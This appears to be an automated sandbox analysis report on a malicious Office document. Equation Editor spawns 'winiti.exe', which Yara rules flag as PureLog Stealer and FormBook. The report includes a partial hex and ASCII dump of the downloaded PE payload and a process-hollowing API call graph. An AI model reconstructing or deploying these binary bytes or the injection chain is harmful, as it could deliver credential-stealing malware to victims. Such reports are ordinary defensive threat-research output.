                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 60 c6 96 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 78 0e 00 00 0a 00 00 00 00 00 00 1e 96 0e 00 00 20 00 00 00 a0 0e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c9 95 0e 00 4f 00 00 00 00 a0 0e 00 18 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0e 00 0c 00 00 00 28 6d 0e 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL`f0x @ @O(mT H.text$v x `.rsrcz@@.reloc@BHLUIPZ}rp}}((*}rp}}((}*0rpsorpssso&oo}{{oo( &o!*_b tw0{rpo"{rpo"{
                            Jul 26, 2024 13:43:07.323726892 CEST1236INData Raw: 00 04 72 01 00 00 70 6f 22 00 00 0a 00 02 7b 1d 00 00 04 02 7b 1e 00 00 04 16 25 0a 6f 23 00 00 0a 00 06 6f 23 00 00 0a 00 02 7b 12 00 00 04 72 01 00 00 70 6f 22 00 00 0a 00 02 7b 11 00 00 04 72 01 00 00 70 6f 22 00 00 0a 00 02 7b 17 00 00 04 72
                            Data Ascii: rpo"{{%o#o#{rpo"{rpo"{rpo"{rpo"{"{!%o#o#{rpo"*&(*0k{'o${o${o${o${o$
                            Jul 26, 2024 13:43:07.323745966 CEST1236INData Raw: 27 00 00 04 16 6f 24 00 00 0a 00 02 7b 06 00 00 04 17 6f 24 00 00 0a 00 02 7b 14 00 00 04 17 6f 24 00 00 0a 00 02 7b 13 00 00 04 17 6f 24 00 00 0a 00 02 7b 15 00 00 04 17 6f 24 00 00 0a 00 02 7b 28 00 00 04 16 6f 24 00 00 0a 00 02 7b 2a 00 00 04
                            Data Ascii: 'o${o${o${o${o${(o${*o$*0{o%rp(09{o%rp(09{o%rp(09{o1-{o19{o%rp(0,v{o
                            Jul 26, 2024 13:43:07.323785067 CEST1236INData Raw: 20 00 00 0a 26 00 de 00 2a 01 10 00 00 00 00 01 00 39 3a 00 11 20 00 00 01 13 30 02 00 2b 00 00 00 02 00 00 11 00 03 2c 0b 02 7b 05 00 00 04 14 fe 03 2b 01 16 0a 06 2c 0e 00 02 7b 05 00 00 04 6f 36 00 00 0a 00 00 02 03 28 37 00 00 0a 00 2a 00 13
                            Data Ascii: &*9: 0+,{+,{o6(7*0(8s9s:}s;}s<}s<}s;}s<}s;}s<}s;}s<}s<}s;}
                            Jul 26, 2024 13:43:07.323801041 CEST1236INData Raw: 6f 53 00 00 0a 00 02 7b 09 00 00 04 1a 6f 54 00 00 0a 00 02 7b 09 00 00 04 72 43 06 00 70 6f 22 00 00 0a 00 02 7b 0a 00 00 04 72 d9 05 00 70 22 00 00 90 41 18 19 16 73 57 00 00 0a 6f 58 00 00 0a 00 02 7b 0a 00 00 04 18 1f 29 73 48 00 00 0a 6f 49
                            Data Ascii: oS{oT{rCpo"{rp"AsWoX{)sHoI{sJoK{r[poL{ T#sRoS{oT{oY{rp"AsZoX{ sHoI{sJoK
                            Jul 26, 2024 13:43:07.323817968 CEST1236INData Raw: 00 0a 00 02 7b 12 00 00 04 1e 6f 5e 00 00 0a 00 02 7b 12 00 00 04 18 20 9b 00 00 00 73 48 00 00 0a 6f 49 00 00 0a 00 02 7b 12 00 00 04 18 18 18 18 73 4a 00 00 0a 6f 4b 00 00 0a 00 02 7b 12 00 00 04 72 3f 07 00 70 6f 4c 00 00 0a 00 02 7b 12 00 00
                            Data Ascii: {o^{ sHoI{sJoK{r?poL{ T#sRoS{oT{ s_o`{rp"AsZoX{ 5 sHoI{sJoK{rMpoL{
                            Jul 26, 2024 13:43:07.323837042 CEST1236INData Raw: 70 6f 4c 00 00 0a 00 02 7b 19 00 00 04 20 54 01 00 00 1f 43 73 52 00 00 0a 6f 53 00 00 0a 00 02 7b 19 00 00 04 1f 13 6f 54 00 00 0a 00 02 7b 1a 00 00 04 17 6f 59 00 00 0a 00 02 7b 1a 00 00 04 72 d9 05 00 70 22 00 00 90 41 17 73 5a 00 00 0a 6f 58
                            Data Ascii: poL{ TCsRoS{oT{oY{rp"AsZoX{ sHoI{sJoK{r/poL{]sRoS{oT{r=po"{oY{rp"AsZoX{
                            Jul 26, 2024 13:43:07.324183941 CEST1236INData Raw: 21 00 00 04 1f 68 18 73 48 00 00 0a 6f 49 00 00 0a 00 02 7b 21 00 00 04 18 18 18 18 73 4a 00 00 0a 6f 4b 00 00 0a 00 02 7b 21 00 00 04 72 b9 08 00 70 6f 4c 00 00 0a 00 02 7b 21 00 00 04 1f 3f 1f 21 73 52 00 00 0a 6f 53 00 00 0a 00 02 7b 21 00 00
                            Data Ascii: !hsHoI{!sJoK{!rpoL{!?!sRoS{!oT{!od{!r4po"{!oa{"oY{"rp"AsWoX{"sHoI{"sJoK{"rpoL{"I
                            Jul 26, 2024 13:43:07.324197054 CEST1236INData Raw: 0a 00 02 7b 27 00 00 04 1f 21 6f 54 00 00 0a 00 02 7b 28 00 00 04 16 6f 24 00 00 0a 00 02 7b 28 00 00 04 72 d9 05 00 70 22 00 00 90 41 17 73 5a 00 00 0a 6f 58 00 00 0a 00 02 7b 28 00 00 04 20 35 02 00 00 20 d2 02 00 00 73 48 00 00 0a 6f 49 00 00
                            Data Ascii: {'!oT{(o${(rp"AsZoX{( 5 sHoI{(sJoK{(rpoL{( !sRoS{("oT{(rpo"{(oa{(s[ob{)rp"AsZoX
                            Jul 26, 2024 13:43:07.324208975 CEST1236INData Raw: 78 00 00 0a 00 02 16 28 77 00 00 0a 00 02 28 78 00 00 0a 00 2a 5e 02 14 7d 2d 00 00 04 02 28 15 00 00 0a 00 00 02 28 21 00 00 06 00 2a 1b 30 03 00 98 00 00 00 01 00 00 11 00 14 0a 00 72 03 00 00 70 73 16 00 00 0a 0a 06 6f 17 00 00 0a 00 72 d7 09
                            Data Ascii: x(w(x*^}-((!*0rpsorpssso&oo}+{+o3rpo5{.{+oo( &o!*ux &(
                            Jul 26, 2024 13:43:07.328825951 CEST1236INData Raw: 0a 16 6f 2c 00 00 0a 6f 84 00 00 0a 00 00 2b 0d 00 72 72 0b 00 70 28 20 00 00 0a 26 00 00 2a 00 00 13 30 03 00 8d 00 00 00 04 00 00 11 00 02 7b 2c 00 00 04 02 7b 2e 00 00 04 6f 83 00 00 0a 17 59 fe 02 16 fe 01 0a 06 2c 6f 00 02 7b 2c 00 00 04 02
                            Data Ascii: o,o+rrp( &*0{,{.oY,o{,{.oY,D{.oY},{.{.o~{,oo+o,o+r0p( &*{I{Io%(zX(o"*0F{I


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:07:43:02
                            Start date:26/07/2024
                            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                            Imagebase:0x13fe70000
                            File size:1'423'704 bytes
                            MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            General

                            Target ID:2
                            Start time:07:43:03
                            Start date:26/07/2024
                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                            Imagebase:0x400000
                            File size:543'304 bytes
                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:5
                            Start time:07:43:07
                            Start date:26/07/2024
                            Path:C:\Users\user\AppData\Roaming\winiti.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\AppData\Roaming\winiti.exe"
                            Imagebase:0xc70000
                            File size:951'296 bytes
                            MD5 hash:1F5C95D40C06C01300F0A6592945A72D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000002.366993516.0000000000240000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000002.367170446.0000000002511000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Antivirus matches:
                            • Detection: 100%, Joe Sandbox ML
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:6
                            Start time:07:43:10
                            Start date:26/07/2024
                            Path:C:\Users\user\AppData\Roaming\winiti.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\AppData\Roaming\winiti.exe"
                            Imagebase:0xc70000
                            File size:951'296 bytes
                            MD5 hash:1F5C95D40C06C01300F0A6592945A72D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.453259452.0000000000140000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.453259452.0000000000140000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.453324257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.453324257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:7
                            Start time:07:43:26
                            Start date:26/07/2024
                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                            Imagebase:0x400000
                            File size:543'304 bytes
                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:16.5%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:0%
                              Total number of Nodes:110
                              Total number of Limit Nodes:0
                              execution_graph 7057 594068 7058 594072 7057->7058 7059 5940ca 7057->7059 7061 594988 7058->7061 7062 5949a2 7061->7062 7063 5949c6 7062->7063 7081 59534b 7062->7081 7085 595157 7062->7085 7090 5951b2 7062->7090 7095 595310 7062->7095 7100 594f7e 7062->7100 7105 59545f 7062->7105 7110 594ebc 7062->7110 7115 594e5c 7062->7115 7122 594f1d 7062->7122 7129 5951c4 7062->7129 7133 595304 7062->7133 7138 594ee0 7062->7138 7143 595121 7062->7143 7147 5954ef 7062->7147 7151 59524f 7062->7151 7156 5955ad 7062->7156 7160 59518a 7062->7160 7063->7059 7165 5934f8 7081->7165 7169 5934f6 7081->7169 7082 595365 7086 594ec8 7085->7086 7086->7063 7173 5938aa 7086->7173 7177 5938b0 7086->7177 7087 59551a 7087->7063 7091 5951b6 7090->7091 7093 5938aa ReadProcessMemory 7091->7093 7094 5938b0 ReadProcessMemory 7091->7094 7092 59551a 7092->7063 7093->7092 7094->7092 7096 594ec8 7095->7096 7096->7063 7098 5938aa ReadProcessMemory 7096->7098 7099 5938b0 ReadProcessMemory 7096->7099 7097 59551a 7097->7063 7098->7097 7099->7097 7101 594fa1 7100->7101 7181 593750 7101->7181 7185 593748 7101->7185 7102 5953d7 7106 595465 7105->7106 7108 593748 WriteProcessMemory 7106->7108 7109 593750 WriteProcessMemory 7106->7109 7107 595631 7108->7107 7109->7107 7111 594ec8 7110->7111 7111->7063 7113 5938aa ReadProcessMemory 7111->7113 7114 5938b0 ReadProcessMemory 7111->7114 7112 59551a 7112->7063 7113->7112 7114->7112 7116 594e62 7115->7116 7189 593ae8 7116->7189 7117 594e96 7117->7063 7120 5938aa ReadProcessMemory 7117->7120 7121 5938b0 ReadProcessMemory 7117->7121 7118 59551a 7118->7063 7120->7118 7121->7118 7193 593628 7122->7193 7197 593622 7122->7197 7123 594ec8 7123->7063 7127 5938aa ReadProcessMemory 7123->7127 7128 5938b0 ReadProcessMemory 7123->7128 7124 59551a 7124->7063 7127->7124 7128->7124 7130 5951de 7129->7130 7201 593408 7130->7201 7131 5951f3 7131->7131 7134 594ec8 7133->7134 7134->7063 7136 5938aa ReadProcessMemory 7134->7136 7137 5938b0 ReadProcessMemory 7134->7137 7135 59551a 7135->7063 7136->7135 7137->7135 7140 594ec8 7138->7140 7139 59551a 7139->7063 7140->7063 7141 5938aa ReadProcessMemory 7140->7141 7142 5938b0 ReadProcessMemory 7140->7142 7141->7139 7142->7139 7144 59512f 7143->7144 7146 593408 ResumeThread 7144->7146 7145 5951f3 7145->7145 7146->7145 7148 59551a 7147->7148 7149 5938aa ReadProcessMemory 7147->7149 7150 5938b0 ReadProcessMemory 7147->7150 7148->7063 7149->7148 7150->7148 7152 594ec8 7151->7152 7152->7063 7154 5938aa ReadProcessMemory 7152->7154 7155 5938b0 ReadProcessMemory 7152->7155 7153 59551a 7153->7063 7154->7153 7155->7153 7157 5956a5 7156->7157 7158 593748 WriteProcessMemory 7157->7158 7159 593750 WriteProcessMemory 7157->7159 7158->7157 7159->7157 7161 594ec8 7160->7161 7161->7063 7163 5938aa ReadProcessMemory 7161->7163 7164 5938b0 ReadProcessMemory 7161->7164 7162 59551a 7162->7063 7163->7162 7164->7162 7166 593541 Wow64SetThreadContext 7165->7166 7168 5935bf 7166->7168 7168->7082 7170 593541 Wow64SetThreadContext 7169->7170 7172 5935bf 7170->7172 7172->7082 7174 5938fc ReadProcessMemory 7173->7174 7176 59397a 7174->7176 7176->7087 7178 5938fc ReadProcessMemory 7177->7178 7180 59397a 7178->7180 7180->7087 7182 59379c WriteProcessMemory 7181->7182 7184 59383b 7182->7184 7184->7102 7186 59379c WriteProcessMemory 7185->7186 7188 59383b 7186->7188 7188->7102 7190 593b6f CreateProcessA 7189->7190 7192 593dcd 7190->7192 7194 59366c VirtualAllocEx 7193->7194 7196 5936ea 7194->7196 7196->7123 7198 59366c VirtualAllocEx 7197->7198 7200 5936ea 7198->7200 7200->7123 7202 59344c ResumeThread 7201->7202 7204 59349e 7202->7204 7204->7131

                              Executed Functions

                              Function 00183D98 Relevance: 5.7, Strings: 4, Instructions: 741COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 183d98-183dca 2 1842fb-184319 0->2 3 183dd0-183e64 0->3 6 184714-184720 2->6 28 183e70-183ec7 3->28 29 183e66-183e6a 3->29 7 184726 6->7 8 184327-184333 6->8 12 184738-18473f 7->12 10 184728-18472d 8->10 11 184339-1843b9 8->11 10->12 30 1843bb-1843c1 11->30 31 1843d1-1843ea 11->31 55 183ecd-183ed5 28->55 56 184245-184269 28->56 29->28 32 1843c3 30->32 33 1843c5-1843c7 30->33 37 18441a-184458 31->37 38 1843ec-184415 31->38 32->31 33->31 51 18445a-18447b 37->51 52 18447d-18448a 37->52 48 184711 38->48 48->6 61 184491-184497 51->61 52->61 58 183edc-183ee4 55->58 59 183ed7-183edb 55->59 65 1842ed-1842f8 56->65 62 183ee9-183f0b 58->62 63 183ee6 58->63 59->58 66 184499-1844b4 61->66 67 1844b6-184508 61->67 71 183f0d 62->71 72 183f10-183f16 62->72 63->62 65->2 66->67 101 18450e-184513 67->101 102 184623-184662 67->102 71->72 75 183f1c-183f36 72->75 76 1841c5-1841d0 72->76 78 183f38-183f3c 75->78 79 183f7b-183f84 75->79 80 1841d2 76->80 81 1841d5-18420c call 180b74 76->81 78->79 85 183f3e-183f49 78->85 83 1842e8 79->83 84 183f8a-183f9a 79->84 80->81 115 18423a-18423f 81->115 116 18420e-184238 81->116 83->65 84->83 86 183fa0-183fb1 84->86 87 183f4f 85->87 88 183fd7-184084 85->88 86->83 92 183fb7-183fc7 86->92 93 183f52-183f54 87->93 103 184094-18415c 88->103 104 184086 88->104 92->83 98 183fcd-183fd4 92->98 94 183f5a-183f65 93->94 95 183f56 93->95 94->83 100 183f6b-183f77 94->100 95->94 98->88 100->93 105 183f79 100->105 109 18451d-184520 101->109 125 18467e-18468d 102->125 126 184664-18467c 102->126 122 18426e-184280 103->122 123 184162-184166 103->123 104->103 107 184088-18408e 104->107 105->88 107->103 112 1845eb-184613 109->112 113 184526 109->113 124 184619-18461d 112->124 117 18452d-184559 113->117 118 1845bd-1845e9 113->118 119 18455e-18458a 113->119 120 18458f-1845bb 113->120 115->56 116->115 117->124 118->124 119->124 120->124 122->83 128 184282-18429f 122->128 123->122 129 18416c-18417b 123->129 124->102 124->109 133 184696-1846f8 125->133 126->133 128->83 135 1842a1-1842bd 128->135 136 1841bb-1841bf 129->136 137 18417d 129->137 148 184703-18470a 133->148 135->83 138 1842bf-1842dd 135->138 136->75 136->76 139 184183-184185 137->139 138->83 142 1842df 138->142 143 18418f-1841ab 139->143 144 184187-18418b 139->144 142->83 143->83 146 1841b1-1841b9 143->146 144->143 146->136 146->139 148->48
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.366966634.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_180000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID: TJ"p$p!p$sk?$xb p
                              • API String ID: 0-565397550
                              • Opcode ID: db2b96f56eaa006ad81866d837777f8356349cbcd897a46424c298c4cee38097
                              • Instruction ID: 9fbebf71d5d0106514ae2cd056a78bccefa79fed8645219859076923b5e53b16
                              • Opcode Fuzzy Hash: db2b96f56eaa006ad81866d837777f8356349cbcd897a46424c298c4cee38097
                              • Instruction Fuzzy Hash: C2623635A00524DFDB14DFA8C884E6DBBB2FF49304F1681A8E509AB266CB31ED91CF40
                              Function 001804C8 Relevance: 1.7, Instructions: 1698COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 213 1804c8-1811a3 216 1811aa-181740 call 180788 * 2 call 180798 * 2 call 1807a8 * 2 call 1807b8 call 1807a8 * 2 call 180788 call 1807c8 call 1807a8 call 1807d8 call 1807e8 call 1807f8 call 180808 call 180818 call 180828 call 180d68 call 1807e8 call 1807f8 call 180808 213->216 217 1811a5 213->217 305 181909-18191c 216->305 217->216 306 181922-182148 call 180818 call 180828 call 180d68 call 1807e8 call 1807f8 call 180808 call 180818 call 180828 call 180d68 call 1807e8 call 1807f8 call 180808 call 180d78 call 180818 call 180828 call 180d68 call 1807e8 call 1807f8 call 180808 call 180818 call 180828 call 180d88 call 180d68 call 180d98 call 1807e8 call 1807f8 call 180808 call 180818 call 180828 call 180d88 call 180d68 call 180d98 call 1807f8 call 180808 call 180818 call 180828 call 180da8 305->306 307 181745-18174c 305->307 430 18214a 306->430 431 18214f-18221f call 180db8 306->431 308 181787-181798 307->308 310 18179a-1817cf 308->310 311 18174e-18177b 308->311 315 1817d1 310->315 316 1817d6-1817fd 310->316 312 18177d-181782 311->312 313 181783-181784 311->313 312->313 313->308 315->316 318 1817ff 316->318 319 181804-181848 316->319 318->319 321 18184a 319->321 322 18184f-181890 319->322 321->322 324 181892 322->324 325 181897-1818b8 322->325 324->325 326 1818f2-181903 325->326 327 1818ba-1818e7 326->327 328 181905-181906 326->328 330 1818e9-1818ed 327->330 331 1818ee-1818ef 327->331 328->305 330->331 331->326 430->431 439 18222a-182db0 call 180d68 call 180dc8 call 1807e8 call 1807f8 call 180808 call 180818 call 180828 call 180d88 call 180d98 call 1807e8 call 1807f8 call 180808 call 180818 call 180828 call 180d88 call 180d98 call 1807e8 call 1807f8 call 180808 call 180818 call 180828 call 1807f8 call 180808 call 180818 call 180dd8 call 180de8 call 180df8 call 1807e8 call 1807f8 call 180808 call 180818 call 180828 call 180d88 call 180d98 call 180e08 call 180e18 call 180e28 call 180e38 * 12 call 180808 call 180e48 call 180e58 call 180e68 431->439
                              Memory Dump Source
                              • Source File: 00000005.00000002.366966634.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_180000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 406a633a2a586956c338d7f59ecd99ee32cc78cb53abf3a4c9773f0340d2f1a7
                              • Instruction ID: bed6823f1cf2b557dbafda0e44abe704fb4204a58c7a65c45311fea0e977a1da
                              • Opcode Fuzzy Hash: 406a633a2a586956c338d7f59ecd99ee32cc78cb53abf3a4c9773f0340d2f1a7
                              • Instruction Fuzzy Hash: 2E03E534A41219CFDBA5EF64C894AE9B7B1FF8A304F5141E9E4096B361DB31AE85CF40
                              Function 00181169 Relevance: 1.5, Instructions: 1543COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 687 181169-1811a3 688 1811aa-181516 call 180788 * 2 call 180798 * 2 call 1807a8 * 2 call 1807b8 call 1807a8 * 2 call 180788 call 1807c8 call 1807a8 call 1807d8 call 1807e8 687->688 689 1811a5 687->689 750 181520-181534 call 1807f8 688->750 689->688 752 181539-181740 call 180808 call 180818 call 180828 call 180d68 call 1807e8 call 1807f8 call 180808 750->752 777 181909-18191c 752->777 778 181922-1820ff call 180818 call 180828 call 180d68 call 1807e8 call 1807f8 call 180808 call 180818 call 180828 call 180d68 call 1807e8 call 1807f8 call 180808 call 180d78 call 180818 call 180828 call 180d68 call 1807e8 call 1807f8 call 180808 call 180818 call 180828 call 180d88 call 180d68 call 180d98 call 1807e8 call 1807f8 call 180808 call 180818 call 180828 call 180d88 call 180d68 call 180d98 call 1807f8 call 180808 call 180818 call 180828 call 180da8 777->778 779 181745-18174c 777->779 899 182105-182132 778->899 780 181787-181798 779->780 782 18179a-1817cf 780->782 783 18174e-18177b 780->783 787 1817d1 782->787 788 1817d6-1817fd 782->788 784 18177d-181782 783->784 785 181783-181784 783->785 784->785 785->780 787->788 790 1817ff 788->790 791 181804-181848 788->791 790->791 793 18184a 791->793 794 18184f-181890 791->794 793->794 796 181892 794->796 797 181897-1818b8 794->797 796->797 798 1818f2-181903 797->798 799 1818ba-1818e7 798->799 800 181905-181906 798->800 802 1818e9-1818ed 799->802 803 1818ee-1818ef 799->803 800->777 802->803 803->798 901 182138-182148 899->901 902 18214a 901->902 903 18214f-1821f6 call 180db8 901->903 902->903 910 182201-18221f 903->910 911 18222a-182db0 call 180d68 call 180dc8 call 1807e8 call 1807f8 call 180808 call 180818 call 180828 call 180d88 call 180d98 call 1807e8 call 1807f8 call 180808 call 180818 call 180828 call 180d88 call 180d98 call 1807e8 call 1807f8 call 180808 call 180818 call 180828 call 1807f8 call 180808 call 180818 call 180dd8 call 180de8 call 180df8 call 1807e8 call 1807f8 call 180808 call 180818 call 180828 call 180d88 call 180d98 call 180e08 call 180e18 call 180e28 call 180e38 * 12 call 180808 call 180e48 call 180e58 call 180e68 910->911
                              Memory Dump Source
                              • Source File: 00000005.00000002.366966634.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_180000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7b1b7aa8d695f84b9240f6325d49ad949203949b5d73e0140c3fad6f24ec3cba
                              • Instruction ID: a8e89ee1304c89cab2cfc5da7c57e07440b0d7dbf38318c66764b27953be5146
                              • Opcode Fuzzy Hash: 7b1b7aa8d695f84b9240f6325d49ad949203949b5d73e0140c3fad6f24ec3cba
                              • Instruction Fuzzy Hash: D6F2E634A51219CFCBA5EB64C894AE9B7B1FF8A304F5141E9E4096B361DB31AEC5CF40
                              Function 00593AE8 Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 149 593ae8-593b81 151 593bca-593bf2 149->151 152 593b83-593b9a 149->152 155 593c38-593c8e 151->155 156 593bf4-593c08 151->156 152->151 157 593b9c-593ba1 152->157 165 593c90-593ca4 155->165 166 593cd4-593dcb CreateProcessA 155->166 156->155 167 593c0a-593c0f 156->167 158 593ba3-593bad 157->158 159 593bc4-593bc7 157->159 162 593baf 158->162 163 593bb1-593bc0 158->163 159->151 162->163 163->163 164 593bc2 163->164 164->159 165->166 174 593ca6-593cab 165->174 185 593dcd-593dd3 166->185 186 593dd4-593eb9 166->186 168 593c11-593c1b 167->168 169 593c32-593c35 167->169 171 593c1d 168->171 172 593c1f-593c2e 168->172 169->155 171->172 172->172 175 593c30 172->175 176 593cad-593cb7 174->176 177 593cce-593cd1 174->177 175->169 179 593cb9 176->179 180 593cbb-593cca 176->180 177->166 179->180 180->180 182 593ccc 180->182 182->177 185->186 198 593ec9-593ecd 186->198 199 593ebb-593ebf 186->199 200 593edd-593ee1 198->200 201 593ecf-593ed3 198->201 199->198 202 593ec1 199->202 204 593ef1-593ef5 200->204 205 593ee3-593ee7 200->205 201->200 203 593ed5 201->203 202->198 203->200 207 593f2b-593f36 204->207 208 593ef7-593f20 204->208 205->204 206 593ee9 205->206 206->204 211 593f37 207->211 208->207 211->211
                              APIs
                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00593DAF
                              Memory Dump Source
                              • Source File: 00000005.00000002.367047125.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_590000_winiti.jbxd
                              Similarity
                              • API ID: CreateProcess
                              • String ID:
                              • API String ID: 963392458-0
                              • Opcode ID: d64106f513ba336e7db2ea484c44ed61bef73c0b0cc2060827ea452ba5473fca
                              • Instruction ID: 6c00e5cf3f66ae410177c0c887f7196cf2cace48922336548b0c4c15f2b38348
                              • Opcode Fuzzy Hash: d64106f513ba336e7db2ea484c44ed61bef73c0b0cc2060827ea452ba5473fca
                              • Instruction Fuzzy Hash: B5C1DF71D00229CFDF24CFA4C845BEEBBB1BF49300F1095A9E919B7290DB749A858F95
                              Function 00593748 Relevance: 1.6, APIs: 1, Instructions: 121injectionCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 598 593748-5937bb 600 5937bd-5937cf 598->600 601 5937d2-593839 WriteProcessMemory 598->601 600->601 603 59383b-593841 601->603 604 593842-593894 601->604 603->604
                              APIs
                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00593823
                              Memory Dump Source
                              • Source File: 00000005.00000002.367047125.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_590000_winiti.jbxd
                              Similarity
                              • API ID: MemoryProcessWrite
                              • String ID:
                              • API String ID: 3559483778-0
                              • Opcode ID: 4f0177e0142abd620d5d9468e79c02a0a6319514965d4c02b2d53a86071e36e5
                              • Instruction ID: a96703184ca1097429eb303ca23d758289585e3162ecd1708898b3c3e9dc2cb4
                              • Opcode Fuzzy Hash: 4f0177e0142abd620d5d9468e79c02a0a6319514965d4c02b2d53a86071e36e5
                              • Instruction Fuzzy Hash: 084199B5D01248DFDF00CFA9D984AEEBBB1BB49310F24942AE818B7250D335AA55CB64
                              Function 00593750 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 609 593750-5937bb 611 5937bd-5937cf 609->611 612 5937d2-593839 WriteProcessMemory 609->612 611->612 614 59383b-593841 612->614 615 593842-593894 612->615 614->615
                              APIs
                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00593823
                              Memory Dump Source
                              • Source File: 00000005.00000002.367047125.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_590000_winiti.jbxd
                              Similarity
                              • API ID: MemoryProcessWrite
                              • String ID:
                              • API String ID: 3559483778-0
                              • Opcode ID: bae939feb2147241e86e9dc51a8e6b53968aecc98fbb4985c702772e60c8e691
